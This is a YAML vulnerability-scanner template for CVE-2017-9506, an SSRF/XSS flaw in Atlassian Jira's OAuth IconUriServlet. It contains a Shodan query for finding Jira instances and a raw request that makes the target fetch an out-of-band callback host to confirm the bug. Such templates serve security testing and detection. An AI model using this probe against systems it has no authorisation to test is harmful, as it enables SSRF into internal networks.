36 lines
1.4 KiB
YAML
36 lines
1.4 KiB
YAML
id: CVE-2017-9506
|
|
|
|
info:
|
|
name: Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery
|
|
author: pdteam
|
|
severity: medium
|
|
description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.
|
|
reference:
|
|
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
|
|
- https://ecosystem.atlassian.net/browse/OAUTH-344
|
|
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-9506
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-9506
|
|
cwe-id: CWE-918
|
|
metadata:
|
|
shodan-query: http.component:"Atlassian Jira"
|
|
tags: cve,cve2017,atlassian,jira,ssrf,oast
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
# Enhanced by mp on 2022/08/12
|